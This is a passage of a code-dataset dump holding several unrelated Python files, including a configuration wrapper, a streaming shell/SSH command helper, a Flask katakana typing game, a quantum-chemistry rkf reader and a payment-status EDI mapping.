A value of None uses no spaces\n and omits new lines as well.\n\n Returns:\n The configuration as a JSON-formatted string.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n json = c_char_p()\n yogi_core.YOGI_ConfigurationDump(self._handle, byref(json), None, int(resolve_variables), indentation)\n return json.value.decode()\n\n def to_json(self, *, resolve_variables: Optional[bool] = None) -> Dict[str, object]:\n \"\"\"Retrieves the configuration as a JSON object.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n\n Returns:\n Dictionary representing the configuration.\n \"\"\"\n return json_module.loads(self.dump(resolve_variables=resolve_variables))\n\n def write_to_file(self, filename: str, *, resolve_variables: Optional[bool] = None,\n indentation: Optional[int] = None) -> None:\n \"\"\"Writes the configuration to a file in JSON format.\n\n This is useful for debugging purposes.\n\n Args:\n filename: Path to the output file.\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n yogi_core.YOGI_ConfigurationWriteToFile(self._handle, filename.encode(), int(resolve_variables), indentation)\n\n def validate(self, schema: 'Configuration', *, section: str = None) -> None:\n \"\"\"Validates the configuration against a JSON Schema.\n\n The validation is based on JSON Schema draft-07, see\n http://json-schema.org/. The schema to validate against has to be\n supplied in the schema parameter which needs to be a configuration\n object itself.\n\n If the validation fails, a DetailedFailureException with the\n CONFIGURATION_VALIDATION_FAILED error will be raised, containing a\n human-readable description about the failure.\n\n The section parameter can be used to specify a section of the\n configuration to validate instead of the whole configuration.\n\n Args:\n schema: The schema to use.\n section: Section in the configuration to validate; syntax is\n JSON pointer (RFC 6901).\n \"\"\"\n if section:\n section = section.encode()\n\n yogi_core.YOGI_ConfigurationValidate(self._handle, section, schema._handle)\n","repo_name":"yohummus/yogi-framework","sub_path":"yogi-python/yogi/_configuration.py","file_name":"_configuration.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70884293852","text":"\"\"\"\nStreaming Shell / SSH Commands.\n\nReturn Generator Objects enabling streaming output\n\n\"\"\"\nimport os\nimport subprocess\n\n\nfrom cmd_exception import ReturnCodeError\nimport ssh_conn\n\n\ndef run_cmd(command, work_dir=None):\n \"\"\"\n Run shell command with streaming output.\n\n Input:\n command - string of command to run\n work_dir - working directory\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n ReturnCodeError\n\n \"\"\"\n if work_dir is not None:\n os.chdir(work_dir) # Change to working directory\n\n # Run Command\n ps = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n\n # Read + yield stdout until process ends\n while ps.poll() is None:\n line = ps.stdout.readline()\n if line != \"\":\n yield line\n\n return_code = ps.returncode\n # Throw exception if return code is not 0\n if return_code:\n exc = \"\\nCOMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n\ndef run_cmd_list(commands, work_dir=None):\n \"\"\"\n Run a list of shell commands with streaming output.\n\n Input:\n commands - list of commands to run\n work_dir - working directory\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n for command in commands:\n for line in run_cmd(command, work_dir):\n yield line\n\n\ndef run_ssh_cmd(host, command, work_dir=None, username=None,\n key_filename=None, _connection=None):\n \"\"\"\n Run shell command over ssh with streaming output.\n\n Input:\n host - target machine\n command - string of command to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n _connection - SSH Connection\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n # If no connection passed in create our own\n if _connection is None:\n ssh = ssh_conn.connect(host, username, key_filename)\n else:\n ssh = _connection\n\n # Handle Working Directory\n if work_dir is not None:\n command = \"cd %s && %s\" % (work_dir, command)\n\n # Run Command\n stdin, stdout, stderr = ssh.exec_command(command)\n\n while True:\n out = stdout.readline()\n # Stderr can block waiting so check to see if its ready\n if stderr.channel.recv_stderr_ready():\n out = out + stderr.readline()\n # If\n if out != \"\":\n yield out\n else:\n break\n\n return_code = stdout.channel.recv_exit_status()\n # Throw exception if return code is not 0\n if return_code:\n ssh.close() # Tidy Up\n exc = \"COMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n if _connection is None:\n ssh.close()\n\n\ndef run_ssh_cmd_list(host, commands, work_dir=None, username=None,\n key_filename=None):\n \"\"\"\n Run a list of shell commands over ssh with streaming output.\n\n Input:\n host - target machine\n commands - list of commands to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n\n ssh = ssh_conn.connect(host, username, key_filename)\n\n for command in commands:\n for line in run_ssh_cmd(host, command, work_dir, 
username,\n key_filename, ssh):\n yield line\n\n ssh.close()\n","repo_name":"graze/pycmd-utils","sub_path":"cmd_utils/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2112718705","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom flask import Flask, render_template, request\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport random\n\napp = Flask(__name__)\n\nMONSTER_NO_MAX=898\nIMG_SOURCE_URL='https://zukan.pokemon.co.jp/detail/'\n\nclass Monster:\n pass\n\n@app.route(\"/\")\n@app.route(\"/\", methods=['GET', 'POST'])\ndef show(id=None, mistake=False):\n if id is None: id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n\n print(id)\n url = IMG_SOURCE_URL + str(id)\n\n http = urllib3.PoolManager()\n r = http.request('GET', url)\n\n soup = BeautifulSoup(r.data, 'html.parser')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:image'})\n img_url = meta_tag[0].get('content')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:title'})\n name = meta_tag[0].get('content').split(u'|')[0].split()[0]\n def translate_kana2alphabet(kana):\n map_k2a = {u'ア':'A', u'イ':'I', u'ウ':'U', u'エ':'E', u'オ':'O', u'カ':'KA', u'キ':'KI',u'ク':'KU',u'ケ':'KE',u'コ':'KO',\n u'サ':'SA',u'シ':'SHI',u'ス':'SU',u'セ':'SE',u'ソ':'SO',u'タ':'TA',u'チ':'CHI',u'ツ':'TU',u'テ':'TE',u'ト':'TO',\n u'ナ':'NA',u'ニ':'NI',u'ヌ':'NU',u'ネ':'NE',u'ノ':'NO',u'ハ':'HA',u'ヒ':'HI',u'フ':'FU',u'ヘ':'HE',u'ホ':'HO',\n u'マ':'MA',u'ミ':'MI',u'ム':'MU',u'メ':'ME',u'モ':'MO',u'ヤ':'YA',u'ユ':'YU',u'ヨ':'YO',u'ワ':'WA',u'ヲ':'WO',u'ン':'NN',\n u'ラ':'RA',u'リ':'RI',u'ル':'RU',u'レ':'RE',u'ロ':'RO',\n u'ガ':'GA',u'ギ':'GI',u'グ':'GU',u'ゲ':'GE',u'ゴ':'GO',u'ザ':'ZA',u'ジ':'JI',u'ズ':'ZU',u'ゼ':'ZE',u'ゾ':'ZO',\n u'ダ':'DA',u'ヂ':'DI',u'ヅ':'DU',u'デ':'DE',u'ド':'DO',u'バ':'BA',u'ビ':'BI',u'ブ':'BU',u'ベ':'BE',u'ボ':'BO',\n u'パ':'PA', u'ピ':'PI',u'プ':'PU',u'ペ':'PE',u'ポ':'PO',u'ヴ':'VU',u'ッ':'XTU',u'ャ':'XYA',u'ュ':'XYU',u'ョ':'XYO',\n u'ァ':'XA',u'ィ':'XI',u'ゥ':'XU',u'ェ':'XE',u'ォ':'XO',\n u'ー':'-',u'・':'',u' ':' ',u'♀':'',u'♂':'',u'Z':'Z',u':': ''}\n alphabets = []\n for char in kana:\n alphabets.append(map_k2a[char])\n\n # 「ッ」の処理\n for i, alphabet in enumerate(alphabets):\n if alphabet == 'XTU': alphabets[i+1] = alphabets[i+1][0] + alphabets[i+1][:]\n\n # 「ャ」「ュ」「ョ」の処理\n # ���下、前の子音+母音でいけるもの KI XYA -> KYA\n # 「キャ」「キュ」「キョ」「シャ」「シュ」「ショ」「チャ」「チュ」「チョ」「ニャ」「ニュ」「ニョ」「ヒャ」「ヒュ」「ヒョ」\n # 「ミャ」「ミュ」「ミョ」「リャ」「リュ」「リョ」「ギャ」「ギュ」「ギョ」「ジャ」「ジュ」「ジョ」「ヂャ」「ヂュ」「ヂョ」\n # 「ビャ」「ビュ」「ビョ」「ピャ」「ピュ」「ピョ」\n for i, alphabet in enumerate(alphabets):\n if alphabet in ('XYA', 'XYU', 'XYO'): \n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][2]\n else:\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1:3]\n elif alphabet in ('XE'):\n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1]\n \n alphabets = [alphabet for alphabet in alphabets if alphabet not in ('XYA', 'XYU', 'XYO','XE', 'XTU', '')]\n print(alphabets)\n return ' '.join(alphabets)\n\n alphabets = translate_kana2alphabet(name)\n\n return render_template('index.html', id=id, img_url=img_url, name=name, alphabets=alphabets, mistake=mistake)\n\n@app.route(\"/check\", methods=['POST'])\ndef cehck():\n print(request.form.get('input'))\n input = request.form.get('input').replace(' ', '')\n name = request.form.get('alphabets').replace(' ', '')\n id = request.form.get('id')\n\n if input.lower() == name.lower():\n new_id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n return show(new_id)\n else:\n return show(id, mistake=True)\n\n@app.route(\"/search\")\ndef search():\n return render_template('search.html')\n\n@app.route(\"/test\")\ndef test():\n return render_template('test.html')\n\nif __name__ == \"__main__\":\n 
#app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 8080)))\n app.run(debug=True)","repo_name":"shuuuuua/typing_monsters","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27600229294","text":"\"\"\"\r\nModule containing functions for extracting SFO data from the rkf files of fragment analysis calculations.\r\nThe following terms can be extracted form the rkf files:\r\n- Overlap (in a.u.)\r\n- Orbital Energy (in eV)\r\n- Occupation (in a.u.)\r\n- Gross Populations (in a.u.)\r\n\r\nBEFORE READING FURTHER: please read the following section about the format of the rkf files:\r\nhttps://www.scm.com/doc/ADF/Appendices/TAPE21.html\r\n\r\nImportant sections together with associated variables are (format: (\"section\", \"variable\")):\r\n- \"Symmetry\", \"ncbs\" = Number of frozen cores per irrep of the complex calculation (could not find a better alternative for Fragment calculations)\r\n- \"SFOs\", \"fragment\" = Fragment index of the ACTIVE* SFOs\r\n- \"SFOs\", \"subspecies\" = Symmetry labels of each ACTIVE SFO (e.g. 1: \"A1\", 2: \"A1\", 3: \"A2\", 4: \"A2\", ...)\r\n- \"SFOs\", \"occupation\" = Occupations of the ACTIVE SFOs\r\n- \"SFOs\", \"escale\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are taken into account)\r\n- \"SFOs\", \"energy\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are NOT taken into account)\r\n- \"SFO popul\", \"sfo_grosspop\" = Gross populations of the SFOs (FROZEN SFOS INCLUDED!)\r\n\r\nthat can be viewed in the KF Browser of AMS (open a \"adf.rkf\" file and press \"ctrl + E\" on Windows or \"cmd + E\" on Mac).\r\n* Active SFOs are SFOs that are not frozen cores.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nfrom typing import Callable, Sequence\r\n\r\nimport numpy as np\r\nfrom scm.plams import KFFile\r\n\r\nfrom orb_analysis.custom_types import Array1D, UnrestrictedPropertyDict, SpinTypes\r\n\r\n# --------------------Helper Function(s)-------------------- #\r\n\r\n\r\ndef split_1d_array_into_dict_sorted_by_irreps(data_array: Array1D, irreps: Sequence[str], ) -> dict[str, Array1D]:\r\n \"\"\"\r\n Splits a 1D array into a dictionary of arrays based on the irreps. The irreps are the keys of the dictionary.\r\n data_array and irreps must have the same length.\r\n \"\"\"\r\n n_entries_per_irrep = [irreps.count(irrep) for irrep in set(irreps)]\r\n data_ordered_by_irrep = {irrep: np.zeros(n_entries) for irrep, n_entries in zip(set(irreps), n_entries_per_irrep)}\r\n\r\n # Now we loop over the irreps and add the data to the right array\r\n irrep_counter = {irrep: 0 for irrep in set(irreps)}\r\n for data_entry, irrep in zip(data_array, irreps):\r\n data_ordered_by_irrep[irrep][irrep_counter[irrep]] = data_entry\r\n irrep_counter[irrep] += 1\r\n return data_ordered_by_irrep\r\n\r\n\r\n# -------------------Low-level KF reading -------------------- #\r\n\r\ndef get_frag_name(kf_file: KFFile, frag_index: int) -> str:\r\n \"\"\" Returns the name of the fragment. \"\"\"\r\n frag_name_per_sfo = kf_file.read(\"SFOs\", \"fragtype\").split() # type: ignore\r\n frag_names = list(dict.fromkeys(frag_name_per_sfo))\r\n return frag_names[frag_index - 1]\r\n\r\n\r\ndef uses_symmetry(kf_file: KFFile) -> bool:\r\n \"\"\" Returns True if the complex calculation uses symmetry for its MOs and other parts such as gross populations and overlap. \"\"\"\r\n grouplabel: str = kf_file.read(\"Symmetry\", \"grouplabel\").split()[0] # type: ignore\r\n return grouplabel.lower() != \"nosym\"\r\n\r\n\r\ndef get_total_number_sfos(kf_file: KFFile) -> int:\r\n \"\"\" Returns the total number of *active* SFOs (frozen core SFOs excluded), which is the sum of the SFOs of both fragments. 
\"\"\"\r\n n_active_sfos = int(kf_file.read(\"SFOs\", \"number\")) # type: ignore\r\n return n_active_sfos\r\n\r\n\r\ndef get_sfo_indices_of_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[int]:\r\n \"\"\" Returns the indices of *active* SFOs belonging to one fragment. \"\"\"\r\n sfo_frag_indices = list(kf_file.read(\"SFOs\", \"fragment\", return_as_list=True)) # type: ignore\r\n sfo_frag_indices = [i for i, sfo_frag_index in enumerate(sfo_frag_indices) if sfo_frag_index == frag_index]\r\n return sfo_frag_indices\r\n\r\n\r\ndef get_irrep_each_sfo_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[str]:\r\n sfo_indices_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n frag_symlabels_each_sfo = list(kf_file.read(\"SFOs\", \"subspecies\").split()) # type: ignore\r\n frag_symlabels_each_sfo = [frag_symlabels_each_sfo[i] for i in sfo_indices_one_frag]\r\n return frag_symlabels_each_sfo\r\n\r\n\r\ndef get_ordered_irreps_of_one_frag(kf_file: KFFile, frag_index: int) -> list[str]:\r\n \"\"\" Returns the ordered irreps of *active* SFOs (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_frag_indices = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n all_sfo_irreps: list[str] = kf_file.read(\"SFOs\", \"subspecies\", return_as_list=True).split() # type: ignore\r\n sfo_irreps_of_one_frag = list(dict.fromkeys([all_sfo_irreps[i] for i in sfo_frag_indices]))\r\n return sfo_irreps_of_one_frag\r\n\r\n\r\ndef get_number_sfos_per_irrep_per_frag(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\" Returns the number of *active* SFOs of each irrep (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_irreps = get_irrep_each_sfo_one_frag(kf_file, frag_index=frag_index)\r\n sfo_irrep_sum = {irrep: sfo_irreps.count(irrep) for irrep in set(sfo_irreps)}\r\n return sfo_irrep_sum\r\n\r\n\r\n# --------------------Frozen Core Handling-------------------- #\r\n\r\ndef get_frozen_cores_per_irrep(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\"\r\n Reads the number of frozen cores per irrep from the KFFile.\r\n\r\n The number of frozen cores per irrep is important for getting gross populations and overlap analysis.\r\n Basically, the SFO index shown in AMSLevels is different than the index shown in the overlap and population analysis because they can be shifted by frozen cores.\r\n\r\n Moreover, if the complex calculation uses symmetry, but the fragments themselves do not, then the \"A\" irrep is added, being the sum of all frozen cores.\r\n\r\n In case there is no frozen core and no symmetry, but the fragments use symmetry, then the frozen core is 0 for all irreps that are present in the fragments.\r\n \"\"\"\r\n ordered_frag_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n n_core_orbs_per_irrep: list[int] = kf_file.read(\"Symmetry\", \"ncbs\", return_as_list=True) # type: ignore since n_core_orbs is a list of ints\r\n\r\n frozen_core_per_irrep = {irrep: n_frozen_cores for irrep, n_frozen_cores in zip(ordered_frag_irreps, n_core_orbs_per_irrep)} # type: ignore\r\n\r\n # Add the \"A\" irrep to the dictionary for the case when symmetry is not used (e.g. 
NoSym), but the fragments themselves use symmetry.\r\n # This is only used for the overlap analysis.\r\n if not uses_symmetry(kf_file):\r\n frozen_core_per_irrep[\"A\"] = sum(n_core_orbs_per_irrep)\r\n return frozen_core_per_irrep\r\n\r\n\r\n# --------------------Restricted Property Function(s)-------------------- #\r\n\r\ndef get_orbital_energies(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the orbital energies from the KFFile. \"\"\"\r\n # escale refers energies scaled by relativistic effects (ZORA). If no relativistic effects are present, \"energy\" is the appropriate key.\r\n variable = \"escale\" if (\"SFOs\", \"escale\") in kf_file else \"energy\"\r\n\r\n # It is either \"escale\" or \"escale_B\", apparently there is no \"escale_A\" key (same for \"energy\")\r\n if spin == SpinTypes.B and (\"SFOs\", f\"{variable}_{SpinTypes.B}\") in kf_file:\r\n variable = f\"{variable}_{SpinTypes.B}\"\r\n\r\n # Reads the orbital energies for both fragments and selects the data for the current fragment\r\n orb_energies = np.array(kf_file.read(\"SFOs\", variable)) # type: ignore\r\n\r\n return orb_energies\r\n\r\n\r\ndef get_occupations(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the occupations from the KFFile. \"\"\"\r\n # It is either \"occupation\" or \"occupation_B\", apparently there is no \"occupation_A\" key\r\n occupation_key = f\"occupation_{SpinTypes.B}\" if spin == SpinTypes.B and (\"SFOs\", f\"occupation_{SpinTypes.B}\") in kf_file else \"occupation\"\r\n occupations = np.array(kf_file.read(\"SFOs\", occupation_key)) # type: ignore\r\n\r\n return occupations\r\n\r\n\r\n# --------------------Unrestricted Property Function(s)-------------------- #\r\n\r\n\r\n# --------------------Property to Function Mapping-------------------- #\r\n\r\n\r\n# Format: {property: (callable function for reading property, section in KFFile, variable in KFFile)}\r\nRESTRICTED_KEY_FUNC_MAPPING: dict[str, Callable] = {\r\n \"orb_energies\": get_orbital_energies,\r\n \"occupations\": get_occupations,\r\n}\r\n\r\n# --------------------Interface Function(s)-------------------- #\r\n\r\n\r\ndef get_fragment_properties(kf_file: KFFile, frag_index: int) -> UnrestrictedPropertyDict:\r\n \"\"\"\r\n Returns a dictionary of dictionaries with the properties of the fragments.\r\n\r\n The properties are:\r\n - Orbital Energies\r\n - Occupations\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n property (\"orb_energies\" / occupations): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n\r\n Note: this will produce double the amount of data when restricted fragments are used because the spin key is not needed for restricted fragments.\r\n Currently, the \"B\" spin is discarded for restricted calcs in the `create_fragment_data` function.\r\n \"\"\"\r\n sfo_indices_of_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index)\r\n frag_irreps_each_sfo = get_irrep_each_sfo_one_frag(kf_file, frag_index)\r\n\r\n data_dic_to_be_unpacked = {property: {str(spin): {} for spin in SpinTypes} for property in RESTRICTED_KEY_FUNC_MAPPING}\r\n\r\n for property, func in RESTRICTED_KEY_FUNC_MAPPING.items():\r\n\r\n for spin in SpinTypes:\r\n\r\n data = func(kf_file, spin=spin)\r\n\r\n data = np.array([data[i] for i in sfo_indices_of_one_frag])\r\n\r\n # Now we turn one long array into a dictionary of arrays sorted by irreps (e.g. [.....] 
-> {\"A1\": [.....], \"A2\": [.....]})\r\n data_dic_to_be_unpacked[property][spin] = split_1d_array_into_dict_sorted_by_irreps(data_array=data, irreps=frag_irreps_each_sfo)\r\n\r\n return data_dic_to_be_unpacked\r\n\r\n\r\ndef get_gross_populations(kf_file: KFFile, frag_index: int = 1) -> dict[str, dict[str, Array1D[np.float64]]]:\r\n \"\"\"\r\n Reads the gross populations from the KFFile by taking into account the frozen cores.\r\n Annoyingly, the \"SFOs\" sections contains the SFOs of both fragments that ALREADY HAVE BEEN FILTERED for the frozen cores.\r\n For example, the SFOs number may be 114, but the gross population array may have 148 entries. This is because the first 34 entries are the frozen cores.\r\n\r\n Structure of the (\"SFOs popul\",\"sfo_grosspop\") section for a restricted calculation with c3v symmetry:\r\n [n Frozen Cores A1, Active SFOs Frag1 A1, Active SFOs Frag2 A1, n Frozen Cores A2, Active SFOs Frag1 A2, Active SFOs Frag2 A2, ...]\r\n\r\n Therefore, the sum of `sfo_indices_of_one_frag` and `n_frozen_cores_per_irrep` is used to get the correct indices for SFOs on both fragments and all irreps.\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n \"\"\"\r\n symmetry_used = uses_symmetry(kf_file)\r\n frags_sfo_irrep_sums = [get_number_sfos_per_irrep_per_frag(kf_file, frag_index=frag_index) for frag_index in [1, 2]]\r\n\r\n ordered_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n frozen_core_per_irrep = get_frozen_cores_per_irrep(kf_file, frag_index=frag_index)\r\n\r\n raw_gross_pop_all_sfos = np.array(kf_file.read(\"SFO popul\", \"sfo_grosspop\"))\r\n\r\n if not symmetry_used:\r\n start_index = sum(frozen_core_per_irrep.values())\r\n total_sfo_sum_frag1 = sum(frags_sfo_irrep_sums[0][irrep] for irrep in frags_sfo_irrep_sums[0])\r\n total_sfo_sum_frag2 = sum(frags_sfo_irrep_sums[1][irrep] for irrep in frags_sfo_irrep_sums[1])\r\n total_sfo_for_one_spin = total_sfo_sum_frag1 + total_sfo_sum_frag2 + start_index\r\n\r\n if frag_index == 1:\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index: start_index + total_sfo_sum_frag1]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin:total_sfo_for_one_spin + total_sfo_sum_frag1]}\r\n }\r\n\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index + total_sfo_sum_frag1: start_index + total_sfo_sum_frag1 + total_sfo_sum_frag2]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin + total_sfo_sum_frag1: total_sfo_for_one_spin + total_sfo_sum_frag1 + total_sfo_sum_frag2]}\r\n }\r\n\r\n gross_pop_active_sfos = {str(spin): {irrep: np.zeros_like(frags_sfo_irrep_sums[frag_index-1][irrep], dtype=np.float64) for irrep in frags_sfo_irrep_sums[frag_index - 1]} for spin in SpinTypes}\r\n\r\n # only works if frag1 and frag2 have the same irreps and thus belong to the same point group\r\n for spin in SpinTypes:\r\n raw_gross_pop_index = 0 if spin == SpinTypes.A else get_total_number_sfos(kf_file) + sum(frozen_core_per_irrep.values())\r\n for irrep in ordered_irreps:\r\n n_frozen_cores = frozen_core_per_irrep.get(irrep, 0)\r\n n_sfos_frag1 = frags_sfo_irrep_sums[0][irrep]\r\n n_sfos_frag2 = frags_sfo_irrep_sums[1][irrep]\r\n start_irrep_index = raw_gross_pop_index + n_frozen_cores\r\n\r\n if frag_index == 1:\r\n end_irrep_index = start_irrep_index + n_sfos_frag1\r\n else:\r\n start_irrep_index += n_sfos_frag1\r\n end_irrep_index = start_irrep_index + n_sfos_frag2\r\n\r\n 
gross_pop_active_sfos[spin][irrep] = raw_gross_pop_all_sfos[start_irrep_index: end_irrep_index]\r\n\r\n raw_gross_pop_index += sum(frags_sfo_irrep_sums[frag_i][irrep] for frag_i in [0, 1]) + n_frozen_cores\r\n\r\n return gross_pop_active_sfos\r\n\r\n\r\n# def main():\r\n# import pathlib as pl\r\n\r\n# current_dir = pl.Path(__file__).parent\r\n# rkf_dir = current_dir.parent.parent.parent / \"test\" / \"fixtures\" / \"rkfs\"\r\n# # rkf_file = 'restricted_largecore_differentfragsym_c4v_full.adf.rkf'\r\n# rkf_file = 'unrestricted_largecore_fragsym_c3v_full.adf.rkf'\r\n# kf_file = KFFile(str(rkf_dir / rkf_file))\r\n\r\n # print(get_orbital_energies(kf_file))\r\n\r\n # print(get_occupations(kf_file))\r\n # print(get_number_sfos_per_irrep_per_frag(kf_file, frag_index=1))\r\n # print(get_frag_name(kf_file, frag_index=2))\r\n # data = get_fragment_properties(kf_file, frag_index=1)\r\n # pprint(data)\r\n # grospop = get_gross_populations(kf_file, frag_index=1)\r\n # print(grospop)\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# main()\r\n","repo_name":"SiebeLeDe/orbitals","sub_path":"src/orb_analysis/orb_functions/sfo_functions.py","file_name":"sfo_functions.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
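The frozen-core bookkeeping documented in get_gross_populations above can be exercised on its own. A minimal sketch with made-up per-irrep counts; the helper and the numbers below are illustrative and not part of the repository:

import numpy as np

# Assumed flat layout, per irrep: [frozen cores | frag1 SFOs | frag2 SFOs], concatenated.
def split_gross_populations(raw, ordered_irreps, frozen, n_frag1, n_frag2, frag_index):
    """Slice a flat gross-population array into {irrep: values} for one fragment."""
    out = {}
    cursor = 0
    for irrep in ordered_irreps:
        start = cursor + frozen.get(irrep, 0)           # skip the frozen-core block
        if frag_index == 1:
            out[irrep] = raw[start: start + n_frag1[irrep]]
        else:
            start += n_frag1[irrep]                     # skip the fragment-1 block
            out[irrep] = raw[start: start + n_frag2[irrep]]
        cursor += frozen.get(irrep, 0) + n_frag1[irrep] + n_frag2[irrep]
    return out

# Made-up numbers: 1 frozen core in A1, then 2 + 2 active SFOs per irrep.
raw = np.arange(9, dtype=float)  # [core, f1, f1, f2, f2, f1, f1, f2, f2]
print(split_gross_populations(raw, ["A1", "A2"], {"A1": 1},
                              {"A1": 2, "A2": 2}, {"A1": 2, "A2": 2}, frag_index=2))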
+{"seq_id":"10096853824","text":"import bots.transform as transform\n\n\ndef main(inn, out):\n\n # Get the original payment id from the original message Id\n original_message_id = inn.get(\n {'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'OrgnlMsgId': None})\n\n # transform.persist_add_update('message_lookup', 'MG12', 'USA65')\n # transform.persist_add_update('message_lookup', 'MG13', 'USA92')\n\n original_payment_id = transform.persist_lookup(\n 'message_lookup', original_message_id)\n\n group_status = inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'GrpSts': None})\n out.data.header = {\n 'payment_identifier': original_payment_id or original_message_id,\n 'transaction_count': inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts',\n 'OrgnlNbOfTxs': None}),\n\n 'status': transform.ccode('Payment Status', group_status, safe=True)\n }\n\n out.data.lines = []\n for pmt_inf in inn.getloop({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlPmtInfAndSts'}):\n\n for txn_inf in pmt_inf.getloop({'BOTSID': 'OrgnlPmtInfAndSts'},\n {'BOTSID': 'TxInfAndSts'}):\n\n status = txn_inf.get({'BOTSID': 'TxInfAndSts', 'TxSts': None})\n additional_status = txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf'},\n {'BOTSID': 'Rsn', 'Cd': None})\n out.data.lines.append({\n 'endtoend_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'OrgnlEndToEndId': None}),\n 'status_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'StsId': None}),\n 'status': transform.ccode('Payment Status', status),\n 'additional_status_code': transform.ccode(\n 'Additional Payment Status', additional_status, safe=True),\n 'additional_status_text': txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf',\n 'AddtlInf': None})\n })\n","repo_name":"abhishek-ram/watg-bots","sub_path":"usersys/mappings/xml/payment_status_xml2html.py","file_name":"payment_status_xml2html.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
